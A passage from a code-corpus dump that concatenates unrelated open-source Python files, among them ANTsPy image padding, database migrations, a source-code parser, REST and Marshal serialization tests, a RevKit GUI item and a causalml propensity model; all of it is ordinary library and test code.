@register_remote('grpc-preproc-seq2seq')
class RemoteGRPCTensorFlowPreprocSeq2Seq(RemoteGRPCTensorFlowPreprocMixin, RemoteGRPCSeq2Seq): pass
@register_remote('grpc-preproc-servable-embeddings')
class RemoteGRPCTensorFlowPreprocEmbeddings(RemoteGRPCTensorFlowPreprocMixin, RemoteGRPCEmbeddings): pass
@register_remote('http-preproc')
class RemoteRESTTensorFlowPreprocMixin(RemoteModelREST):
def create_request(self, examples):
inputs = {}
if isinstance(examples['tokens'], np.ndarray):
inputs['tokens'] = examples['tokens'].tolist()
else:
inputs['tokens'] = examples['tokens']
for feature in self.input_keys:
if feature.endswith('lengths'):
if isinstance(examples[feature], np.ndarray):
inputs[feature] = examples[feature].tolist()
else:
inputs[feature] = examples[feature]
return {'signature_name': self.signature, 'inputs': inputs}
@register_remote('http-preproc-classify')
class RemoteRESTTensorFlowPreprocClassifier(RemoteRESTTensorFlowPreprocMixin, RemoteRESTClassifier): pass
@register_remote('http-preproc-tagger')
class RemoteRESTTensorFlowPreprocTagger(RemoteRESTTensorFlowPreprocMixin, RemoteRESTTagger): pass
@register_remote('http-preproc-seq2seq')
class RemoteRESTTensorFlowPreprocSeq2Seq(RemoteRESTTensorFlowPreprocMixin, RemoteRESTSeq2Seq): pass
@register_remote('http-preproc-servable-embeddings')
class RemoteRESTTensorFlowPreprocEmbeddings(RemoteRESTTensorFlowPreprocMixin, RemoteRESTEmbeddings): pass
|
ants/utils/pad_image.py | xemio/ANTsPy | 338 | 11089670 |
__all__ = ['pad_image']
import math
from ..core import ants_image as iio
from .. import utils
def pad_image(image, shape=None, pad_width=None, value=0.0, return_padvals=False):
"""
Pad an image to have the given shape or to be isotropic.
Arguments
---------
image : ANTsImage
image to pad
shape : tuple
- if shape is given, the image will be padded in each dimension
until it has this shape
- if shape is not given, the image will be padded along each
dimension to match the largest existing dimension so that it
has isotropic dimension
pad_width : list of
pad_value : scalar
value with which image will be padded
Example
-------
>>> import ants
>>> img = ants.image_read(ants.get_data('r16'))
>>> img2 = ants.pad_image(img, shape=(300,300))
>>> mni = ants.image_read(ants.get_data('mni'))
>>> mni2 = ants.pad_image(mni)
>>> mni3 = ants.pad_image(mni, pad_width=[(0,4),(0,4),(0,4)])
>>> mni4 = ants.pad_image(mni, pad_width=(4,4,4))
"""
inpixeltype = image.pixeltype
ndim = image.dimension
if image.pixeltype != 'float':
image = image.clone('float')
if pad_width is None:
if shape is None:
shape = [max(image.shape)] * image.dimension
lower_pad_vals = [math.floor(max(ns-os,0)/2) for os,ns in zip(image.shape, shape)]
upper_pad_vals = [math.ceil(max(ns-os,0)/2) for os,ns in zip(image.shape, shape)]
else:
if shape is not None:
raise ValueError('Cannot give both `shape` and `pad_width`. Pick one!')
if len(pad_width) != image.dimension:
raise ValueError('Must give pad width for each image dimension')
lower_pad_vals = []
upper_pad_vals = []
for p in pad_width:
if isinstance(p, (list, tuple)):
lower_pad_vals.append(p[0])
upper_pad_vals.append(p[1])
else:
lower_pad_vals.append(math.floor(p/2))
upper_pad_vals.append(math.ceil(p/2))
libfn = utils.get_lib_fn('padImageF%i' % ndim)
itkimage = libfn(image.pointer, lower_pad_vals, upper_pad_vals, value)
new_image = iio.ANTsImage(pixeltype='float', dimension=ndim,
components=image.components, pointer=itkimage).clone(inpixeltype)
if return_padvals:
return new_image, lower_pad_vals, upper_pad_vals
else:
return new_image
|
examples/pipeline/app_without_args.py | pichatelli/simple-settings | 213 | 11089701 | from simple_settings import LazySettings
settings = LazySettings(
'first_settings', 'second_settings'
)
print(settings.ONLY_IN_FIRST)
print(settings.ONLY_IN_SECOND)
print(settings.SIMPLE_CONF)
|
conftest.py | jiduque/scikit-fda | 147 | 11089704 | import pytest
# https://github.com/scikit-learn/scikit-learn/issues/8959
import numpy as np
try:
np.set_printoptions(sign=' ')
except TypeError:
pass
collect_ignore = ['setup.py', 'docs/conf.py']
pytest.register_assert_rewrite("skfda")
|
ghidra_9.0/Ghidra/Features/Python/data/jython-2.7.1/Lib/select.py | ChristopherMorrison/ghidra | 577 | 11089709 | # dispatches to _socket for actual implementation
from _socket import (
POLLIN,
POLLOUT,
POLLPRI,
POLLERR,
POLLHUP,
POLLNVAL,
error,
poll,
select)
# backwards compatibility with Jython 2.5
cpython_compatible_select = select
__all__ = [
"POLLIN", "POLLOUT", "POLLPRI", "POLLERR", "POLLHUP", "POLLNVAL",
"error", "poll", "select", "cpython_compatible_select"]
|
atcoder/abc078/b.py | Ashindustry007/competitive-programming | 506 | 11089720 | #!/usr/bin/env python2
# https://abc078.contest.atcoder.jp/tasks/abc078_b
x, y, z = map(int, raw_input().split())
print (x - z) // (y + z)
|
spruned/application/migrations/__init__.py | darosior/spruned | 152 | 11089731 | <filename>spruned/application/migrations/__init__.py<gh_stars>100-1000
import os
def get_version(sql):
table_info = "PRAGMA table_info('migrations')"
from sqlalchemy.exc import ResourceClosedError
try:
if not sql.execute(table_info).fetchall():
return 0
except ResourceClosedError as e:
if 'does not return rows' in str(e):
return 0
version_query = "SELECT version from migrations"
version = sql.execute(version_query).fetchone()
return version and version[0] or 0
def gather_migrations():
current_path = os.path.realpath(__file__).rstrip('__init__.py')
files = os.listdir(current_path)
return {
int(x.replace('migration_', '').replace('.py', '')): current_path + x
for x in files if x.startswith('migration_')
}
def apply_migration(sql, migration):
from importlib.machinery import SourceFileLoader
module = SourceFileLoader('migration_%s' % migration, migration).load_module()
module.migrate(sql)
def run(sql):
version = get_version(sql)
migrations = gather_migrations()
from spruned.application.logging_factory import Logger
Logger.root.debug(
'Database migrations. Current version: %s, migrations available: %s', version, max(migrations.keys())
)
missing_migrations = sorted([x for x in migrations.keys() if x > version])
for migration in missing_migrations:
apply_migration(sql, migrations[migration])
|
transpyle/general/parser.py | EraYaN/transpyle | 107 | 11089746 | <gh_stars>100-1000
"""Definition of parser."""
import collections.abc
import pathlib
import re
import textwrap
import typing as t
from .registry import Registry
from .code_reader import CodeReader
# def remove_trailing_whitespace(code: str) -> str:
# raise NotImplementedError()
def validate_indentation(code: str, path: pathlib.Path = None):
"""Raise error if code isn't consistently indented (either only with spaces, or only with tabs).
Path is optional and used only for diagnostic purposes (i.e. if error happens).
"""
if not isinstance(code, str):
raise TypeError('code must be string but {} given'.format(type(code)))
assert path is None or isinstance(path, pathlib.Path), type(path)
lines = code.splitlines(keepends=True)
whitespace = r'[ \t]*'
mixed_indent = r'( {0}\t{0})|(\t{0} {0})'.format(whitespace)
indent_by_spaces = r'[ ]+'
indent_by_tabs = r'[\t]+'
indented_with_spaces = None # type: t.Optional[bool]
for i, line in enumerate(lines):
# check if indentation is not mixed
if re.match(mixed_indent, line) is not None:
raise ValueError('{}:{} mixed indentation found in {}'.format(
'<string>' if path is None else path, i, repr(line)))
# check if indentation type is consistent
if indented_with_spaces is None:
if re.match(indent_by_spaces, line) is not None:
indented_with_spaces = True
elif re.match(indent_by_tabs, line) is not None:
indented_with_spaces = False
elif indented_with_spaces:
if re.match(indent_by_tabs, line) is not None:
raise ValueError(
'{}:{} after space indent in previous lines, tab indent found in {}'
.format('<string>' if path is None else path, i, repr(line)))
else:
if re.match(indent_by_spaces, line) is not None:
raise ValueError(
'{}:{} after tab indent in previous lines, space indent found in {}'
.format('<string>' if path is None else path, i, repr(line)))
class Parser(Registry):
"""Extract abstract representation of syntax from the source code."""
def __init__(self, default_scopes: t.Sequence[t.Tuple[int, t.Optional[int]]] = None):
"""Initialize new Parser instance.
Default scopes, if provided, limit parsing to the given line sections unless the default
is overriden.
"""
self._code_reader = None
if default_scopes is None:
default_scopes = [(0, None)]
self.default_scopes = default_scopes
def parse(self, code: str, path: pathlib.Path = None,
scopes: t.Sequence[t.Tuple[int, t.Optional[int]]] = None, dedent: bool = True):
"""Parse given code into a language-specific AST.
If path is provided, use it to guide the parser if necessary, as well as for diagnostics.
"""
assert isinstance(code, str), type(code)
assert path is None or isinstance(path, pathlib.Path), type(path)
assert scopes is None or isinstance(scopes, collections.abc.Sequence), type(scopes)
if scopes is None:
scopes = self.default_scopes
parsed_scopes = []
for begin, end in scopes:
assert isinstance(begin, int), type(begin)
assert end is None or isinstance(end, int), type(end)
if begin == 0 and end is None:
code_scope = code
else:
lines = code.splitlines(keepends=True)
if end is None:
end = len(lines)
code_scope = ''.join(lines[begin:end])
validate_indentation(code_scope, path)
if dedent:
code_scope = textwrap.dedent(code_scope)
parsed_scope = self._parse_scope(code_scope, path)
parsed_scopes.append(parsed_scope)
if len(scopes) == 1:
return parsed_scopes[0]
return self._join_scopes(parsed_scopes)
def _parse_scope(self, code: str, path: pathlib.Path = None):
raise NotImplementedError('{} is abstract'.format(type(self).__name__))
def _join_scopes(self, parsed_scopes):
raise NotImplementedError('{} cannot join multiple parsed scopes'
.format(type(self).__name__))
def parse_file(self, path: pathlib.Path):
"""Read and parse a given file."""
if self._code_reader is None:
self._code_reader = CodeReader()
code = self._code_reader.read_file(path)
return self.parse(code, path, dedent=False)
|
conda-recipe/run_test.py | ktanishqk/py-earth | 360 | 11089771 | <reponame>ktanishqk/py-earth<filename>conda-recipe/run_test.py<gh_stars>100-1000
import pyearth
import nose
import os
pyearth_dir = os.path.dirname(
os.path.abspath(pyearth.__file__))
os.chdir(pyearth_dir)
nose.run(module=pyearth)
|
py/rest_tests/test_metadata.py | ahmedengu/h2o-3 | 6,098 | 11089857 | import h2o
import h2o_test_utils
def test(a_node, pp):
####################################
# test schemas collection GET
if h2o_test_utils.isVerbose(): print('Testing /Metadata/schemas. . .')
schemas = a_node.schemas(timeoutSecs=240)
assert 'schemas' in schemas, "FAIL: failed to find 'schemas' field in output of /Metadata/schemas: " + repr(schemas)
assert type(schemas['schemas']) is list, "'schemas' field in output of /Metadata/schemas is not a list: " + repr(schemas)
assert len(schemas['schemas']) > 0, "'schemas' field in output of /Metadata/schemas is empty: " + repr(schemas)
if h2o_test_utils.isVerboser():
print('Schemas: ')
pp.pprint(schemas)
####################################
# test schemas individual GET
if h2o_test_utils.isVerbose(): print('Testing /Metadata/schemas/FrameV3. . .')
schemas = a_node.schema(schemaname='FrameV3', timeoutSecs=240)
assert 'schemas' in schemas, "FAIL: failed to find 'schemas' field in output of /Metadata/schemas/FrameV3: " + repr(schemas)
assert type(schemas['schemas']) is list, "'schemas' field in output of /Metadata/schemas/FrameV3 is not a list: " + repr(schemas)
assert len(schemas['schemas']) == 1, "'schemas' field in output of /Metadata/schemas/FrameV3 has an unexpected length: " + repr(schemas)
if h2o_test_utils.isVerboser():
print('Schemas: ')
pp.pprint(schemas)
#########################
# test Metadata/endpoints
if h2o_test_utils.isVerbose(): print('Testing /Metadata/endpoints. . .')
endpoints = a_node.endpoints()
assert 'routes' in endpoints, "FAIL: failed to find routes in the endpoints result."
assert type(endpoints['routes']) is list, "FAIL: routes in the endpoints result is not a list."
assert len(endpoints['routes']) > 0, "FAIL: routes list in the endpoints result is empty."
assert type(endpoints['routes'][0]) is dict, "FAIL: routes[0] in the endpoints result is not a dict."
assert 'input_schema' in endpoints['routes'][0], "FAIL: routes[0] in the endpoints result does not have an 'input_schema' field."
#########################
# test Metadata/schemas
if h2o_test_utils.isVerbose(): print('Testing /Metadata/schemas. . .')
schemas = a_node.schemas()
assert 'schemas' in schemas, "FAIL: failed to find schemas in the schemas result."
assert type(schemas['schemas']) is list, "FAIL: schemas in the schemas result is not a list."
assert len(schemas['schemas']) > 0, "FAIL: schemas list in the schemas result is empty."
assert type(schemas['schemas'][0]) is dict, "FAIL: schemas[0] in the schemas result is not a dict."
assert 'fields' in schemas['schemas'][0], "FAIL: schemas[0] in the schemas result does not have an 'fields' field."
|
tests/modules/test_marshal.py | ruby-compiler-survey/topaz | 241 | 11089858 | from ..base import BaseTopazTest
class TestMarshal(BaseTopazTest):
def test_version_constants(self, space):
w_res = space.execute("return Marshal::MAJOR_VERSION")
assert space.int_w(w_res) == 4
w_res = space.execute("return Marshal::MINOR_VERSION")
assert space.int_w(w_res) == 8
w_res = space.execute("return Marshal.dump('test')[0].ord")
assert space.int_w(w_res) == 4
w_res = space.execute("return Marshal.dump('test')[1].ord")
assert space.int_w(w_res) == 8
def test_dump_constants(self, space):
w_res = space.execute("return Marshal.dump(nil)")
assert space.str_w(w_res) == "\x04\b0"
w_res = space.execute("return Marshal.dump(true)")
assert space.str_w(w_res) == "\x04\bT"
w_res = space.execute("return Marshal.dump(false)")
assert space.str_w(w_res) == "\x04\bF"
def test_load_constants(self, space):
w_res = space.execute("return Marshal.load('\x04\b0')")
assert w_res == space.w_nil
w_res = space.execute("return Marshal.load('\x04\bT')")
assert w_res == space.w_true
w_res = space.execute("return Marshal.load('\x04\bF')")
assert w_res == space.w_false
def test_constants(self, space):
w_res = space.execute("return Marshal.load(Marshal.dump(nil))")
assert w_res == space.w_nil
w_res = space.execute("return Marshal.load(Marshal.dump(true))")
assert w_res == space.w_true
w_res = space.execute("return Marshal.load(Marshal.dump(false))")
assert w_res == space.w_false
def test_dump_tiny_integer(self, space):
w_res = space.execute("return Marshal.dump(5)")
assert space.str_w(w_res) == "\x04\bi\n"
w_res = space.execute("return Marshal.dump(100)")
assert space.str_w(w_res) == "\x04\bii"
w_res = space.execute("return Marshal.dump(0)")
assert space.str_w(w_res) == "\x04\bi\x00"
w_res = space.execute("return Marshal.dump(-1)")
assert space.str_w(w_res) == "\x04\bi\xFA"
w_res = space.execute("return Marshal.dump(-123)")
assert space.str_w(w_res) == "\x04\bi\x80"
w_res = space.execute("return Marshal.dump(122)")
assert space.str_w(w_res) == "\x04\bi\x7F"
def test_load_tiny_integer(self, space):
w_res = space.execute("return Marshal.load('\x04\bi\n')")
assert space.int_w(w_res) == 5
w_res = space.execute("return Marshal.load('\x04\bii')")
assert space.int_w(w_res) == 100
# w_res = space.execute('return Marshal.load("\x04\bi\x00")')
w_res = space.execute('return Marshal.load(Marshal.dump(0))')
assert space.int_w(w_res) == 0
w_res = space.execute("return Marshal.load('\x04\bi\xFA')")
assert space.int_w(w_res) == -1
w_res = space.execute("return Marshal.load('\x04\bi\x80')")
assert space.int_w(w_res) == -123
w_res = space.execute("return Marshal.load('\x04\bi\x7F')")
assert space.int_w(w_res) == 122
def test_dump_array(self, space):
w_res = space.execute("return Marshal.dump([])")
assert space.str_w(w_res) == "\x04\b[\x00"
w_res = space.execute("return Marshal.dump([nil])")
assert space.str_w(w_res) == "\x04\b[\x060"
w_res = space.execute("return Marshal.dump([nil, true, false])")
assert space.str_w(w_res) == "\x04\b[\b0TF"
w_res = space.execute("return Marshal.dump([1, 2, 3])")
assert space.str_w(w_res) == "\x04\b[\x08i\x06i\x07i\x08"
w_res = space.execute("return Marshal.dump([1, [2, 3], 4])")
assert space.str_w(w_res) == "\x04\b[\bi\x06[\ai\ai\bi\t"
w_res = space.execute("return Marshal.dump([:foo, :bar])")
assert space.str_w(w_res) == "\x04\b[\a:\bfoo:\bbar"
def test_load_array(self, space):
# w_res = space.execute("return Marshal.load('\x04\b[\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump([]))")
assert self.unwrap(space, w_res) == []
w_res = space.execute("return Marshal.load('\x04\b[\x060')")
assert self.unwrap(space, w_res) == [None]
w_res = space.execute("return Marshal.load('\x04\b[\b0TF')")
assert self.unwrap(space, w_res) == [None, True, False]
w_res = space.execute("return Marshal.load('\x04\b[\x08i\x06i\x07i\x08')")
assert self.unwrap(space, w_res) == [1, 2, 3]
w_res = space.execute("return Marshal.load('\x04\b[\bi\x06[\ai\ai\bi\t')")
assert self.unwrap(space, w_res) == [1, [2, 3], 4]
w_res = space.execute("return Marshal.load('\x04\b[\a:\bfoo:\bbar')")
assert self.unwrap(space, w_res) == ["foo", "bar"]
def test_dump_symbol(self, space):
w_res = space.execute("return Marshal.dump(:abc)")
assert space.str_w(w_res) == "\x04\b:\babc"
w_res = space.execute("return Marshal.dump(('hello' * 25).to_sym)")
assert space.str_w(w_res) == "\x04\b:\x01}" + "hello" * 25
w_res = space.execute("return Marshal.dump(('hello' * 100).to_sym)")
assert space.str_w(w_res) == "\x04\b:\x02\xF4\x01" + "hello" * 100
def test_load_symbol(self, space):
w_res = space.execute("return Marshal.load('\x04\b:\babc')")
assert space.symbol_w(w_res) == "abc"
w_res = space.execute("return Marshal.load('\x04\b:\x01}' + 'hello' * 25)")
assert space.symbol_w(w_res) == "hello" * 25
def test_dump_hash(self, space):
w_res = space.execute("return Marshal.dump({})")
assert space.str_w(w_res) == "\x04\b{\x00"
w_res = space.execute("return Marshal.dump({1 => 2, 3 => 4})")
assert self.unwrap(space, w_res) == "\x04\b{\ai\x06i\ai\bi\t"
w_res = space.execute("return Marshal.dump({1 => {2 => 3}, 4 => 5})")
assert self.unwrap(space, w_res) == "\x04\b{\ai\x06{\x06i\ai\bi\ti\n"
w_res = space.execute("return Marshal.dump({1234 => {23456 => 3456789}, 4 => 5})")
assert self.unwrap(space, w_res) == "\x04\b{\ai\x02\xD2\x04{\x06i\x02\xA0[i\x03\x15\xBF4i\ti\n"
def test_load_hash(self, space):
# w_res = space.execute("return Marshal.load('\x04\b{\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump({}))")
assert self.unwrap(space, w_res) == {}
w_res = space.execute("return Marshal.load('\x04\b{\ai\x06i\ai\bi\t')")
assert self.unwrap(space, w_res) == {1: 2, 3: 4}
w_res = space.execute("return Marshal.load('\x04\b{\ai\x06{\x06i\ai\bi\ti\n')")
assert self.unwrap(space, w_res) == {1: {2: 3}, 4: 5}
w_res = space.execute("return Marshal.load('\x04\b{\ai\x02\xD2\x04{\x06i\x02\xA0[i\x03\x15\xBF4i\ti\n')")
assert self.unwrap(space, w_res) == {1234: {23456: 3456789}, 4: 5}
def test_dump_integer(self, space):
w_res = space.execute("return Marshal.dump(123)")
assert space.str_w(w_res) == "\x04\bi\x01{"
w_res = space.execute("return Marshal.dump(255)")
assert space.str_w(w_res) == "\x04\bi\x01\xFF"
w_res = space.execute("return Marshal.dump(256)")
assert space.str_w(w_res) == "\x04\bi\x02\x00\x01"
w_res = space.execute("return Marshal.dump(2 ** 16 - 2)")
assert space.str_w(w_res) == "\x04\bi\x02\xFE\xFF"
w_res = space.execute("return Marshal.dump(2 ** 16 - 1)")
assert space.str_w(w_res) == "\x04\bi\x02\xFF\xFF"
w_res = space.execute("return Marshal.dump(2 ** 16)")
assert space.str_w(w_res) == "\x04\bi\x03\x00\x00\x01"
w_res = space.execute("return Marshal.dump(2 ** 16 + 1)")
assert space.str_w(w_res) == "\x04\bi\x03\x01\x00\x01"
w_res = space.execute("return Marshal.dump(2 ** 30 - 1)")
assert space.str_w(w_res) == "\x04\bi\x04\xFF\xFF\xFF?"
# TODO: test tooo big numbers (they give a warning and inf)
def test_load_integer(self, space):
w_res = space.execute("return Marshal.load('\x04\bi\x01{')")
assert space.int_w(w_res) == 123
w_res = space.execute("return Marshal.load('\x04\bi\x01\xFF')")
assert space.int_w(w_res) == 255
# w_res = space.execute("return Marshal.load('\x04\bi\x02\x00\x01')")
w_res = space.execute("return Marshal.load(Marshal.dump(256))")
assert space.int_w(w_res) == 256
w_res = space.execute("return Marshal.load('\x04\bi\x02\xFE\xFF')")
assert space.int_w(w_res) == 2 ** 16 - 2
w_res = space.execute("return Marshal.load('\x04\bi\x02\xFF\xFF')")
assert space.int_w(w_res) == 2 ** 16 - 1
# w_res = space.execute("return Marshal.load('\x04\bi\x03\x00\x00\x01')")
w_res = space.execute("return Marshal.load(Marshal.dump(2 ** 16))")
assert space.int_w(w_res) == 2 ** 16
# w_res = space.execute("return Marshal.load('\x04\bi\x03\x01\x00\x01')")
w_res = space.execute("return Marshal.load(Marshal.dump(2 ** 16 + 1))")
assert space.int_w(w_res) == 2 ** 16 + 1
w_res = space.execute("return Marshal.load('\x04\bi\x04\xFF\xFF\xFF?')")
assert space.int_w(w_res) == 2 ** 30 - 1
def test_dump_negative_integer(self, space):
w_res = space.execute("return Marshal.dump(-1)")
assert space.str_w(w_res) == "\x04\bi\xFA"
w_res = space.execute("return Marshal.dump(-123)")
assert space.str_w(w_res) == "\x04\bi\x80"
w_res = space.execute("return Marshal.dump(-124)")
assert space.str_w(w_res) == "\x04\bi\xFF\x84"
w_res = space.execute("return Marshal.dump(-256)")
assert space.str_w(w_res) == "\x04\bi\xFF\x00"
w_res = space.execute("return Marshal.dump(-257)")
assert space.str_w(w_res) == "\x04\bi\xFE\xFF\xFE"
w_res = space.execute("return Marshal.dump(-(2 ** 30))")
assert space.str_w(w_res) == "\x04\bi\xFC\x00\x00\x00\xC0"
def test_load_negative_integer(self, space):
w_res = space.execute("return Marshal.load('\x04\bi\xFA')")
assert space.int_w(w_res) == -1
w_res = space.execute("return Marshal.load('\x04\bi\x80')")
assert space.int_w(w_res) == -123
w_res = space.execute("return Marshal.load('\x04\bi\xFF\x84')")
assert space.int_w(w_res) == -124
# w_res = space.execute("return Marshal.load('\x04\bi\xFF\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump(-256))")
assert space.int_w(w_res) == -256
w_res = space.execute("return Marshal.load('\x04\bi\xFE\xFF\xFE')")
assert space.int_w(w_res) == -257
# w_res = space.execute("return Marshal.load('\x04\bi\xFE\x00\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 16)))")
assert space.int_w(w_res) == -(2 ** 16)
w_res = space.execute("return Marshal.load('\x04\bi\xFD\xFF\xFF\xFE')")
assert space.int_w(w_res) == -(2 ** 16 + 1)
# w_res = space.execute("return Marshal.load('\x04\bi\xFC\x00\x00\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 24)))")
assert space.int_w(w_res) == -(2 ** 24)
w_res = space.execute("return Marshal.load('\x04\bi\xFC\xFF\xFF\xFF\xFE')")
assert space.int_w(w_res) == -(2 ** 24 + 1)
# w_res = space.execute("return Marshal.load('\x04\bi\xFC\x00\x00\x00\xC0')")
w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 30)))")
assert space.int_w(w_res) == -(2 ** 30)
def test_dump_float(self, space):
w_res = space.execute("return Marshal.dump(0.0)")
assert space.str_w(w_res) == "\x04\bf\x060"
w_res = space.execute("return Marshal.dump(0.1)")
assert space.str_w(w_res) == "\x04\bf\b0.1"
w_res = space.execute("return Marshal.dump(1.0)")
assert space.str_w(w_res) == "\x04\bf\x061"
w_res = space.execute("return Marshal.dump(1.1)")
assert space.str_w(w_res) == "\x04\bf\b1.1"
w_res = space.execute("return Marshal.dump(1.001)")
assert space.str_w(w_res) == "\x04\bf\n1.001"
# w_res = space.execute("return Marshal.dump(123456789.123456789)")
# assert space.str_w(w_res) == "\x04\bf\x17123456789.12345679"
# w_res = space.execute("return Marshal.dump(-123456789.123456789)")
# assert space.str_w(w_res) == "\x04\bf\x18-123456789.12345679"
# w_res = space.execute("return Marshal.dump(-0.0)")
# assert space.str_w(w_res) == "\x04\bf\a-0"
def test_load_float(self, space):
w_res = space.execute("return Marshal.load('\x04\bf\x060')")
assert space.float_w(w_res) == 0.0
w_res = space.execute("return Marshal.load('\x04\bf\b0.1')")
assert space.float_w(w_res) == 0.1
w_res = space.execute("return Marshal.load('\x04\bf\x061')")
assert space.float_w(w_res) == 1.0
w_res = space.execute("return Marshal.load('\x04\bf\b1.1')")
assert space.float_w(w_res) == 1.1
w_res = space.execute("return Marshal.load('\x04\bf\n1.001')")
assert space.float_w(w_res) == 1.001
# w_res = space.execute("return Marshal.load('\x04\bf\x17123456789.12345679')")
# assert space.float_w(w_res) == 123456789.123456789
# w_res = space.execute("return Marshal.load('\x04\bf\x18-123456789.12345679')")
# assert space.float_w(w_res) == -123456789.123456789
# w_res = space.execute("return Marshal.load('\x04\bf\a-0')")
# assert repr(space.float_w(w_res)) == repr(-0.0)
def test_dump_string(self, space):
w_res = space.execute("return Marshal.dump('')")
assert space.str_w(w_res) == "\x04\bI\"\x00\x06:\x06ET"
w_res = space.execute("return Marshal.dump('abc')")
assert space.str_w(w_res) == "\x04\bI\"\babc\x06:\x06ET"
w_res = space.execute("return Marshal.dump('i am a longer string')")
assert space.str_w(w_res) == "\x04\bI\"\x19i am a longer string\x06:\x06ET"
def test_load_string(self, space):
# w_res = space.execute("return Marshal.load('\x04\bI\"\x00\x06:\x06ET')")
w_res = space.execute("return Marshal.load(Marshal.dump(''))")
assert space.str_w(w_res) == ""
w_res = space.execute("return Marshal.load('\x04\bI\"\babc\x06:\x06ET')")
assert space.str_w(w_res) == "abc"
w_res = space.execute("return Marshal.load('\x04\bI\"\x19i am a longer string\x06:\x06ET')")
assert space.str_w(w_res) == "i am a longer string"
def test_array(self, space):
w_res = space.execute("return Marshal.load(Marshal.dump([1, 2, 3]))")
assert self.unwrap(space, w_res) == [1, 2, 3]
w_res = space.execute("return Marshal.load(Marshal.dump([1, [2, 3], 4]))")
assert self.unwrap(space, w_res) == [1, [2, 3], 4]
w_res = space.execute("return Marshal.load(Marshal.dump([130, [2, 3], 4]))")
assert self.unwrap(space, w_res) == [130, [2, 3], 4]
w_res = space.execute("return Marshal.load(Marshal.dump([-10000, [2, 123456], -9000]))")
assert self.unwrap(space, w_res) == [-10000, [2, 123456], -9000]
w_res = space.execute("return Marshal.load(Marshal.dump([:foo, :bar]))")
assert self.unwrap(space, w_res) == ["foo", "bar"]
w_res = space.execute("return Marshal.load(Marshal.dump(['foo', 'bar']))")
assert self.unwrap(space, w_res) == ["foo", "bar"]
def test_incompatible_format(self, space):
with self.raises(
space,
"TypeError",
"incompatible marshal file format (can't be read)\n"
"format version 4.8 required; 97.115 given"
):
space.execute("Marshal.load('asd')")
def test_short_data(self, space):
with self.raises(space, "ArgumentError", "marshal data too short"):
space.execute("Marshal.load('')")
def test_parameters(self, space):
with self.raises(space, "TypeError", "instance of IO needed"):
space.execute("Marshal.load(4)")
def test_io(self, space, tmpdir):
f = tmpdir.join("testfile")
w_res = space.execute("""
Marshal.dump('hallo', File.new('%s', 'wb'))
file = File.open('%s', 'rb')
return Marshal.load(file.read)
""" % (f, f))
assert space.str_w(w_res) == "hallo"
w_res = space.execute("""
Marshal.dump('hallo', File.new('%s', 'wb'))
file = File.open('%s', 'rb')
return Marshal.load(file)
""" % (f, f))
assert space.str_w(w_res) == "hallo"
|
rkqc/tools/gui/items/ESOPSynthesisItem.py | clairechingching/ScaffCC | 158 | 11089877 | <gh_stars>100-1000
# RevKit: A Toolkit for Reversible Circuit Design (www.revkit.org)
# Copyright (C) 2009-2011 The RevKit Developers <<EMAIL>>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt4.QtCore import QSize, pyqtProperty
from revkit import circuit, esop_synthesis, weighted_reordering
from core.BaseItem import *
from helpers.RevKitHelper import *
from ui.DesignerWidget import DesignerWidget
from ui.ESOPSynthesis import Ui_ESOPSynthesis
class ESOPSynthesis( DesignerWidget ):
def __init__( self, parent = None ):
DesignerWidget.__init__( self, Ui_ESOPSynthesis, parent )
@item( "ESOP Synthesis",
requires = "PLA", provides = "Circuit",
properties = [ "separate_polarities", "reordering", "alpha", "beta", "garbage_name" ],
widget = { 'class': ESOPSynthesis, 'size': (350, 200) } )
class ESOPSynthesisItem( BaseItem ):
"""This item provides the ESOP-based synthesis method. After the item has been processed, the enlarged item reports the run-time needed to perform the synthesis."""
def onCreate( self ):
self.setText( "ESOP Synthesis" )
self.setState( self.CONFIGURED )
def executeEvent( self, inputs ):
circ = circuit()
res = esop_synthesis( circ, inputs[0],
separate_polarities = bool( int( self.separate_polarities ) ),
reordering = weighted_reordering( float( self.alpha ), float( self.beta ) ),
garbage_name = str( self.garbage_name ) )
if type( res ) == dict:
circuit_set_name( circ, inputs[0] )
self.widget.runtime.setText( "%.2f s" % res['runtime'] )
circuit_add_runtime( circ, res['runtime'] )
else:
return res
return [ circ ]
|
causalml/propensity.py | rainfireliang/causalml | 2,919 | 11089922 | from abc import ABCMeta, abstractmethod
import logging
import numpy as np
from pygam import LogisticGAM, s
from sklearn.metrics import roc_auc_score as auc
from sklearn.linear_model import LogisticRegressionCV
from sklearn.model_selection import StratifiedKFold, train_test_split
import xgboost as xgb
logger = logging.getLogger('causalml')
class PropensityModel(metaclass=ABCMeta):
def __init__(self, clip_bounds=(1e-3, 1 - 1e-3), **model_kwargs):
"""
Args:
clip_bounds (tuple): lower and upper bounds for clipping propensity scores. Bounds should be implemented
such that: 0 < lower < upper < 1, to avoid division by zero in BaseRLearner.fit_predict() step.
model_kwargs: Keyword arguments to be passed to the underlying classification model.
"""
self.clip_bounds = clip_bounds
self.model_kwargs = model_kwargs
self.model = self._model
@property
@abstractmethod
def _model(self):
pass
def __repr__(self):
return self.model.__repr__()
def fit(self, X, y):
"""
Fit a propensity model.
Args:
X (numpy.ndarray): a feature matrix
y (numpy.ndarray): a binary target vector
"""
self.model.fit(X, y)
def predict(self, X):
"""
Predict propensity scores.
Args:
X (numpy.ndarray): a feature matrix
Returns:
(numpy.ndarray): Propensity scores between 0 and 1.
"""
return np.clip(
self.model.predict_proba(X)[:, 1], *self.clip_bounds
)
def fit_predict(self, X, y):
"""
Fit a propensity model and predict propensity scores.
Args:
X (numpy.ndarray): a feature matrix
y (numpy.ndarray): a binary target vector
Returns:
(numpy.ndarray): Propensity scores between 0 and 1.
"""
self.fit(X, y)
propensity_scores = self.predict(X)
logger.info('AUC score: {:.6f}'.format(auc(y, propensity_scores)))
return propensity_scores
class LogisticRegressionPropensityModel(PropensityModel):
"""
